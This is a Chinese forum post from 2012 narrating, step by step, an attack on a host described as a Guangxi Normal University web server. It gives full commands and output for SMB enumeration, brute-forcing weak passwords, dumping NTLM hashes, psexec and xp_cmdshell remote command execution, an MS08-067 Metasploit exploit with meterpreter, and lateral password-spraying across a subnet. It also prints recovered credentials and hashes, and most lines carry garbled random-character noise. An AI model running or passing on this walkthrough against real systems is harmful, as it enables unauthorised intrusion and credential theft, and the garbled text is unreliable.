广西师范网站http://202.103.242.241/; Q N' q: a4 `: E8 r4 e8 @
4 s+ {4 M/ [. Mroot@bt:~# nmap -sS -sV 202.103.242.241; K. d; X! i3 ^0 J
$ r0 [1 Y8 ?. w# I+ V
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
' v) K# y- o( ^; J: h9 \* a% i1 Q% O$ Z. T Z* ^
Nmap scan report for bogon (202.103.242.241). J8 m* t% e6 G" b4 I o. \) y8 S
6 F8 y2 k/ c$ l m7 YHost is up (0.00048s latency).% f3 m v, Q$ K
( F( e! Y% P& |# X1 \9 |Not shown: 993 closed ports. f$ Y4 c) d- n* P7 e% d
+ R& n, o6 S* T& [) BPORT STATE SERVICE VERSION
: [4 f8 r/ n$ B) s, T
3 s2 Q( x% V K0 Q( W, y135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
3 p! J" U* Y2 `- |
! w3 _& r0 G0 a" l7 L4 `& c& e139/tcp open netbios-ssn
% x# B! I' j9 {, m6 Y' `1 M8 e3 S) R9 T
# M+ V2 f. E- z5 \4 j3 \# G1 u: _445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
/ u% ~+ z; r. ~% n( b* N
0 ]; M: L4 I4 T! L% Y4 a ?) L1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)7 ^4 L: Y( p) @6 b! M+ {( G" J
4 w5 B0 k8 Z3 {* [4 T7 m1026/tcp open msrpc Microsoft Windows RPC) t: I5 `- n2 n4 \0 f
$ K/ S: x% c# q$ j3 a+ z( [/ J
3372/tcp open msdtc?8 [; t( k3 U' E5 Y* e% n `% `
7 c. p! u7 N2 L! V9 i7 r, \3389/tcp open ms-term-serv?: d* h: X+ c# p: U
- E# M. J% j9 W& n/ ~ ~
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :3 O6 C0 U4 M" [. a2 J$ H
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r$ p% w. q! h3 d3 ?5 _8 r+ ?# v
: D W0 {2 g2 u. @
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
4 H) s& k# L% Q2 U+ v( n; u: @' L4 U* C2 }. x% K2 Q" G$ [
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”); H7 l2 P i4 l7 L- ?) B( N
; h% i a! z0 @) _SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
2 o5 z5 h% x; j9 t+ P- }
; T5 @2 p9 D9 q+ s: Q8 G5 dSF:ptions,6,”hO\n\x000Z”);: h1 O- A# L! _$ [" W
- [ o( I1 q! b `MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)$ X/ v$ U. B0 n3 K ?. y
; C/ ?( ^: c" n+ I% QService Info: OS: Windows) j5 L8 {. r H
4 y4 J# a4 F! Y; `6 x3 f* aService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
4 N- T3 d0 i& a" h9 h$ x# Z3 S. |6 B2 B1 u* a. q( Z$ u F# K( ~
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
. I0 D( a% m, L y, X3 W6 b: F$ g6 v5 Z( f9 [2 E* K
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本" S7 w: q- w2 \4 I' j2 ~) d/ [
' m1 ^$ o2 ]6 j8 s; S1 ~
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
4 K; Y/ U/ K+ [1 V$ ~0 i
$ g' I- X4 \! Q# m r/ z! O-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
2 F. }8 o) W4 }, ?" n( {" r$ @$ a, W4 j4 P% g" b. @
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse1 r2 n ?3 T" n7 y
4 V( {/ u+ d2 L4 W# S9 i-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
6 y/ Z( r$ X7 c& w# n0 p: c, a! `8 {9 a3 Q @
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse2 O- O9 X$ T* U, [
: t. x; p! Z$ [# y- \4 w! {
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse# q: D; s3 j. c/ d$ S- M/ {: c
' E) d3 a. j& p; o4 ~1 V$ [- T! O9 S) l
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse3 I7 R( E0 `) S: |' I9 ^
; Z C7 y4 o( {* d4 s0 f, i' X7 Z5 p; V-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse; l5 d5 H# @9 i" R: |
3 l# a4 r+ Y4 s9 l- o2 N2 M: M- J: l-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse+ p p- i$ I3 ]5 J) c5 m1 s1 ~8 `* d
2 `$ d" [) c# p# i-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
. `! O' u# ^! t: `( \0 A- C
2 }" e+ n# `1 m7 z! g5 `! A-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
/ i+ o% a! z1 L& X e: [$ d5 M9 D# N# I) {6 X
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse3 {+ D' E7 l2 e2 j
! j6 K6 o: `' N4 w1 M2 x
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse4 {6 V) @/ G4 D) V
# D+ a- Z$ F" U-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
! p, ~6 P6 g. _% s4 u2 u1 T1 l0 C, E+ \9 X5 X
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
+ r4 Y( z6 i+ @; d
- N: @# N; `! Hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
8 @7 y5 l+ ^ M8 r/ q9 Q2 @
% `$ @. _/ l% D3 E( Q* t+ _9 d3 ~//此乃使用脚本扫描远程机器所存在的账户名2 y+ I' f# G5 X: E) {# l+ I2 P
9 g9 |2 W% l5 n( a) e2 FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
# U& ^) q b1 p- \7 `
8 ?) p8 `2 ?1 }" Y1 D( e: |Nmap scan report for bogon (202.103.242.241)
3 }3 F' O* Z- t+ J( | [
& z- g6 p2 e" a7 t THost is up (0.00038s latency).' u9 W6 j) l) ~$ M3 H0 f
! W" L1 c' v5 Z# c) C/ Z
Not shown: 993 closed ports
/ _ K Q1 R! E; u7 y
+ c, m P+ V! A* D d' f* nPORT STATE SERVICE
: n& I& w$ o; L6 E9 Z
) k5 L% q! B0 w0 l- a135/tcp open msrpc4 ?! j1 j+ N2 N& J" N6 I
" C# J( [% K( H* b$ q* y
139/tcp open netbios-ssn
) c: E0 ? n4 _9 P: z$ @6 ?: a5 w; B( q" U# E! K( Q0 F
445/tcp open microsoft-ds
, X3 u8 d. E# {
# A6 ~# b5 z# E% v% W6 A. ~9 V1025/tcp open NFS-or-IIS
, }5 w2 y- _- R3 @( n
; e6 Y3 r) U. w+ Q1026/tcp open LSA-or-nterm
2 q. |) P \3 }
; ]$ M& ?1 y+ x* n2 Q3372/tcp open msdtc
6 N. W. t! B& b9 b' ?# [! W
, u, s. s- V! O3389/tcp open ms-term-serv; e( b5 [" q; [* u1 e$ [
, M) P5 w3 P; d5 n' j5 ^! D/ w- JMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, n: X( k' Y* B' O d3 i
7 k! f2 L6 I2 i& M& E$ r! E# UHost script results:3 {2 O% g1 ]4 ?. a( b5 k, l
4 s$ q& B( k* O& a) q| smb-enum-users:1 j* d8 d" `9 z$ P6 d l
4 h' b) f) v/ q1 I- Y|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
4 Y% F3 Z/ g5 y" a& p: K- U. v& i) j; \: e
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds2 f% }1 e/ ?/ H+ K5 S' L/ B9 [
0 Q# t" x& w# droot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
, b" c7 w1 u$ C# c w- u6 i
, b8 H/ q2 q* q& L6 u2 i( _//查看共享6 Q9 K4 w2 {+ o. V0 L
0 {3 ]2 f3 L2 Z( Y" pStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST0 s. s8 r, b; i1 U9 `% S* ^
, e% x6 f, T% a, O' VNmap scan report for bogon (202.103.242.241)
* d4 j: h! B7 w$ J+ C3 U) }% \" o* V0 X- O5 q
Host is up (0.00035s latency).
( S Z3 }0 _: L3 Z: Y* \4 y$ X7 q$ f( t
Not shown: 993 closed ports3 g* X/ T4 m( q$ s. e" M I* r; P
4 Y# f% ^( m. A: V1 n. J
PORT STATE SERVICE( F- \$ D. F& t4 Y9 V, [
( H, G& f+ }5 y7 H* ^& Q135/tcp open msrpc
$ I3 Q5 [* K2 ?, a& f" w
$ S* }# \( a; [9 C139/tcp open netbios-ssn
" c1 d8 Z8 b1 z! H+ T$ Q8 Y h0 [" G6 a6 w
445/tcp open microsoft-ds O9 R+ W5 l* h' C( Q2 z0 F+ c; k
" r* G0 ~* a8 R# P. X. j5 c1025/tcp open NFS-or-IIS4 w, i7 Q3 S- [
4 K. p' H. L( b, w T
1026/tcp open LSA-or-nterm
6 u! w% w) w8 ~6 H
4 @3 \; [) y0 x: n# x& i7 I4 ~3372/tcp open msdtc
& b! K& x( _& q7 Y) x
) `7 |( J: n; h' c6 i! u3389/tcp open ms-term-serv
( z8 a+ Y. r `0 [9 @# W% J- s$ U9 V3 h& O2 y6 X- q0 z) b
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( e/ J6 m4 K! B* e
O6 x! O: f9 S9 tHost script results:
; U' ?- q! ?9 Z. z4 T* {# H- d. n) @
| smb-enum-shares:
' }; Z) k @8 R' H
1 T3 d3 Z) r! b* I0 s| ADMIN$
# r6 ^. {4 X0 E+ L( G8 @
# B1 J- `7 z9 V% P; o" O| Anonymous access: <none>
4 Y/ [9 q' V, P. I( ~4 h6 \' Y/ x
# y6 J# ]/ H; Z# ^| C$
6 C. n h+ E% n5 A8 Z+ p
, [3 K$ [& N1 g: y" t| Anonymous access: <none>! K$ B1 a: x4 |# \
, G6 ^$ ^0 R" f% [: \: g- w
| IPC$
6 G& i& k' s$ o8 `9 {* s# p4 U$ ], i& Q- S" p7 Q
|_ Anonymous access: READ
: W9 I" ?7 a7 _9 @$ Y% |3 I7 O2 m) P, i
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
3 M% E: L6 L0 q$ [7 N* E5 _" s1 q$ R
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 n5 t! \- J1 |" d) H- o
4 ?3 ~* D5 k9 S//获取用户密码
7 z) F0 M& a6 T) x" a' F7 f
8 k# t* x/ g T% _- AStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST) t% _! E& Z" P' A0 z( R
; z% t5 E' e0 U' W( w
Nmap scan report for bogon (202.103.242.2418)* M k+ d7 _/ ?0 Y4 V
8 w# N( N; z' _3 ] x5 |Host is up (0.00041s latency).
& W, c1 f* ~3 L4 @
: S% r: M" T; B& Y6 c( mNot shown: 993 closed ports
# z8 j; ?: Q4 |: b8 _1 {
; s" d6 X2 B2 \# iPORT STATE SERVICE
9 }. u, O& I9 u K+ J
# a! r$ {$ x7 k135/tcp open msrpc
}8 A& _/ H6 e# {
0 D& e" C" X% _# h! L# Z139/tcp open netbios-ssn
2 H3 `& @/ G* a# o; e9 s4 [6 q4 g* ]
445/tcp open microsoft-ds
" V. l9 `. q3 L$ A
7 a, N |- Y7 l1025/tcp open NFS-or-IIS7 R4 ]6 d8 n, Y1 D7 y4 ^ ]
7 O. w$ t, l* C' G& \. f1026/tcp open LSA-or-nterm* b- z* |4 v" e6 `8 ^ t p
7 B( k6 R) Q$ W
3372/tcp open msdtc
" ~0 e. ]1 N# H( K2 S" F# ?
( e" g7 x3 h% t( w3 y2 Q3389/tcp open ms-term-serv0 g+ d# ~. Q; ^# {+ |* B
% `5 K" R5 r$ oMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( e' ?0 C: ~" Q
& ~* `: _/ i3 U- l- v$ G) EHost script results:
4 Z s1 T4 ~2 \4 p, l# Q) n6 t9 h9 M8 R' z# C7 k, F; J+ k+ c8 T# H
| smb-brute:
; e/ D! F1 d0 q# g* D5 R0 |3 X0 G# \. D# F; E
administrator:<blank> => Login was successful' b. ]; R6 i, T6 s. L
* k2 d6 P- b2 @3 i1 g% F; a+ M
|_ test:123456 => Login was successful/ g+ t0 O0 B$ M1 k! Z! m
' w( E/ Z5 S- Q t% f' s6 N6 C$ q: TNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
( L! m' b/ l0 [: o
- K& j" [! C3 A- q2 V1 Lroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
) K; V3 w- P8 Q; y- {3 I/ r$ Z) ]- j# r# D6 c' t) |
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data1 T+ N+ i" n5 B1 {3 i% K& h
) U. D, V) J; C5 |. Wroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse+ G3 I8 }+ V( ]$ O, e' T7 n
5 V2 `5 u- M; j: Nroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139; ?0 b' I7 ]% a& o
- e2 [6 ], e" v. _0 T. FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST( o5 S1 t+ V6 X) z# H, K
4 M' L+ j9 j+ g; l# |4 ^7 CNmap scan report for bogon (202.103.242.241)
2 ~8 P5 ~; t# { L1 G7 e
m I% P! |3 E X0 b% _Host is up (0.0012s latency).) {% B5 k- z6 m; h; c$ g, u+ C
' r! M! x2 |2 L1 T0 tPORT STATE SERVICE
6 r# U$ g5 f. z: R$ D$ F
5 t P3 _$ q, D) ^135/tcp open msrpc
+ p3 r+ ]: Z. R5 S
3 H+ B; H3 z- H! s$ f1 O: _139/tcp open netbios-ssn
& R5 \6 Z2 q4 n3 w* X& |
2 T ?! [4 O' r* R% B+ ~' c445/tcp open microsoft-ds
8 I& z- `# m5 L2 T8 s6 h! k% B# T1 \" _: V. _7 p
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: O: e' n4 }. Z% F. Z! u& `3 H% o- u8 w1 @2 D" R. F8 K8 x
Host script results:
# L$ L( _. P2 b4 t; r8 u
1 O0 I" R" Q W& I- l) I$ I7 W| smb-pwdump:
' A# f; b0 S( D7 F, V; j) o! r, j! B" Z' E2 m5 m7 ?! j; E
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************) G# U5 X6 k. P
6 v8 T/ {) o4 h% n* m# ?5 l1 e, ?
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
" N3 A0 A( C: t( e% Y8 c3 g7 }& ^9 K
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4" K! E$ k5 c4 u3 u. k( M: ^+ B
8 P4 s6 F Y1 A* @4 V m# E
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2& U5 K5 Q2 k; i8 p+ {, v' d
: L: K9 z( m1 T( s) x2 ~Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds |: n$ a3 Z% k. s+ C% k7 [
' ?2 v3 }4 g+ @% @ U
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell9 c- [. u6 n8 W; H
7 |: E o/ {8 w' a
-p 123456 -e cmd.exe+ P! Q$ j! D( _) u& Z
: p+ a" J- ^$ ?
PsExec v1.55 – Execute processes remotely
' W- @7 ^; ?, P- R0 K7 U7 c: k, o
1 Z9 O# U+ T$ _% ]4 l8 T- p: _: KCopyright (C) 2001-2004 Mark Russinovich' ]4 D7 L( X- G% C
6 z) P3 k3 c9 P1 {* k) u4 [6 i9 aSysinternals – www.sysinternals.com4 q% F; {( j9 o" `% g
/ m% J0 T {( W' ]# m+ CMicrosoft Windows 2000 [Version 5.00.2195]
/ R% U1 I, B# J; w( e" N# b1 F; w3 D
(C) 版权所有 1985-2000 Microsoft Corp.
& d4 W: I9 k8 g) J
# z7 O4 E- t4 w2 b' n1 M$ a9 fC:\WINNT\system32>ipconfig( |. w, y9 m. R; i% U0 f. J/ d. \
2 X8 X: B6 m7 J2 @; _, d
Windows 2000 IP Configuration
! w/ G: s) T/ g; _6 b( a4 q3 }8 ^% c C, N) J, Y O* Q! R, G% X
Ethernet adapter 本地连接:% _) T& l! s7 m: M; r5 _8 m$ [
6 q5 y( l5 e% K5 {3 k" O) ]# R0 uConnection-specific DNS Suffix . :* N0 ^% V8 ^3 M. X5 i7 H' O
% d4 y I1 w) l. w6 }# n
IP Address. . . . . . . . . . . . : 202.103.242.241; {; m; V2 @3 v$ D$ i& M
% `0 X* D0 l: T. hSubnet Mask . . . . . . . . . . . : 255.255.255.0
6 R$ h+ K; t0 c$ W. z5 f2 M% }5 p
# U4 a6 H8 U/ c3 h( D5 |Default Gateway . . . . . . . . . : 202.103.1.1
_7 _0 h! z% x; p* k' A- v
/ L8 _0 T" x+ m' k! \C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
0 u' n0 A* t0 e) F
v5 B( h5 P& |5 S8 [/ Groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞; x. N5 ^( U8 ^/ E b7 g$ G7 h) t
7 _! u$ }; ^' t& d+ a1 ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST+ A4 G) I6 u. |- X/ j) {
! L9 `8 y' C5 A; @0 E
Nmap scan report for bogon (202.103.242.241), ^- r4 E% o2 E9 p3 o+ L! g
. c. |; l2 M4 M$ nHost is up (0.00046s latency).
" G6 }# }' W. X# w. D3 e$ F% s
$ y* |% p* B4 `% G: ~9 f7 |) u. b/ NNot shown: 993 closed ports
# \6 a3 C y- X' m- ^5 Q9 I1 d& |; f4 G6 |' L4 @ w. I
PORT STATE SERVICE
+ Q" P# s+ S1 t Y U6 F- g: |! V) }) @" I: C7 U \4 f) _
135/tcp open msrpc
2 l# b. a; c: ?* E0 d5 |$ T$ L+ u
9 h8 V# P" ?; Q" ?5 y! N139/tcp open netbios-ssn
4 a5 [# p- n& m- W4 w6 _/ w1 Q
, ^& o; [" Q* o4 l445/tcp open microsoft-ds- Q* p {3 W+ Z6 }% _3 Y' i H- s
r& `# p. u! ]# |& R. x1025/tcp open NFS-or-IIS0 o: S% \" f1 j1 `0 e! m, N
% x" C; G5 |3 \6 m4 A
1026/tcp open LSA-or-nterm
* n8 | f; U3 G f
K9 a# _ R6 ?9 t7 w3372/tcp open msdtc
5 N( S# _ P) E5 @; b6 D l
$ z( U7 v7 n6 n- [/ h3389/tcp open ms-term-serv* X$ o7 I. C B) ]
4 T0 ^1 A0 k) R
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% v! y9 W* G) R' l6 a' {2 c8 }2 s' R
' U$ _( C0 [' G+ i
Host script results:
; Z9 A1 v. \2 Y0 X3 w" N9 n `* h" p1 y! ~. _+ r
| smb-check-vulns:! Q# o5 t$ `) n5 l/ j
$ j! S; \+ [8 o1 O% K- |3 T
|_ MS08-067: VULNERABLE
; g) o! I3 H# T W
; N9 c+ T8 s9 Z( J: E5 `/ V" bNmap done: 1 IP address (1 host up) scanned in 1.43 seconds4 U. w8 a8 J! Y0 T) t/ m
8 X8 \! K' b! R/ w. j. N! _, L
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
0 W3 s0 s% c9 K6 S- P% D& v j' L) ~: G2 k3 O) S/ N; u
msf > search ms08. ^$ c# [ m6 n" ]+ o; y" I
5 q8 l6 O* b9 S5 Q
msf > use exploit/windows/smb/ms08_067_netapi8 b- N5 w$ f1 l) h; U$ l: F
p/ _7 z" U# ]5 M' U
msf exploit(ms08_067_netapi) > show options
2 d2 s1 Z+ L1 x
P8 i$ B: c6 Rmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241# j" F* P8 v. n; d; J, Q1 w% d
4 y$ o; e! B) p9 S. V$ h+ v8 y6 P
msf exploit(ms08_067_netapi) > show payloads
f" J) ]! |: k. w5 B0 x7 [1 F) S _* m6 u9 Z6 d7 m8 Q
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
2 X# T! p8 A5 p5 K z2 j. K) e
+ _. \% y y X$ Kmsf exploit(ms08_067_netapi) > exploit
3 o) I) l) c9 {
2 k6 K% c( {* G( n; F0 w6 c, vmeterpreter >* Z$ {# {. ~! j' _0 P9 ^' U7 \ ^
! ^! H3 t/ P( ^Background session 2? [y/N] (ctrl+z)" D0 F7 r+ k- r5 n, p7 L2 @9 [
: t( J+ T% {3 C$ ^
msf exploit(ms08_067_netapi) > sessions -l# ^+ U( ]+ G0 @8 n; `! I8 f. u
7 H" h2 A9 {: t' p- K6 U: \root@bt:/usr/local/share/nmap/scripts# vim usernames.txt/ J$ g% W+ C* u" A) S2 M/ Y) r# s0 R
) t A) h% J3 s5 T" jtest
& s7 a$ l' ~% [7 Y! n$ s% t2 U7 ? F0 W; }: B
administrator
- N9 C1 f& m+ N- b# O% [( r, u
1 Z! k" O3 {: O0 ?* W$ d% Vroot@bt:/usr/local/share/nmap/scripts# vim password.txt. |6 o% m+ H a0 g) L5 S
1 {! o* `5 y& z) m% h0 Y) E, ]
44EFCE164AB921CAAAD3B435B51404EE
! ]% Q; o) t: y% X; k# S# {; b) P9 k# t. y
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 & p z* x Y( [# w$ _
4 R5 Z; E3 n5 W8 Z
//利用用户名跟获取的hash尝试对整段内网进行登录
* M& ?; G: i- S4 b4 J: R: ]( A
Nmap scan report for 192.168.1.105
" B2 f( j# C- z6 B2 F/ H/ v5 I* n; W3 o, f0 \0 A
Host is up (0.00088s latency).+ f7 L8 M J6 X m2 ~; { i
9 _7 ?, g6 ~) tNot shown: 993 closed ports, m9 a9 ]" d6 x) A" W' I# x( w+ D
0 ]# C* v5 {' o8 kPORT STATE SERVICE
2 Y8 O2 u1 o9 o
7 `7 L5 s# K0 \135/tcp open msrpc
6 n+ J/ R( M6 h+ }1 B3 f
' w; w: l+ a- u/ v% D3 \, L139/tcp open netbios-ssn4 Q3 p; n* n- r; j- F8 N
' ^6 ]: {" p$ ~/ ~) V
445/tcp open microsoft-ds# v3 z# X" k# m) r4 Z* P _
: I. m5 h6 e" Z( P! M) s) ?8 M1025/tcp open NFS-or-IIS3 V) s- V( H8 x/ ^& [
9 t; X7 m# \, ~, O+ \/ o' k
1026/tcp open LSA-or-nterm
& [2 P" J% e4 \ S2 j' ^
( a& p6 }9 K. d' Q6 p6 F( y3372/tcp open msdtc. I6 u6 }- m, u1 e1 c. L
: w+ G$ u4 s0 k1 w! W& j
3389/tcp open ms-term-serv- @) @ I) P( d. ]3 L% E2 v% h# X7 B
' q, n9 W2 ~8 y" H
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ h+ @/ S* m- W) R) ~# ?
, R( A0 W0 C4 A0 e# `/ S- ~
Host script results:7 \: v$ ~& n& X
0 ?0 e" c8 |. N) r* S: ]2 b0 U
| smb-brute:2 I# l {/ D7 S. e' d. P
4 W _7 ?# f0 m3 y. ^( O
|_ administrator:<blank> => Login was successful5 Z+ u0 M1 m( g, Z
5 N5 z$ E8 \- H+ y" r攻击成功,一个简单的msf+nmap攻击~~·
- B* m. \ ` G- J* u7 O o9 V8 V7 R$ ]
|
发表于 2012-12-4 12:46:42
收藏
支持
反对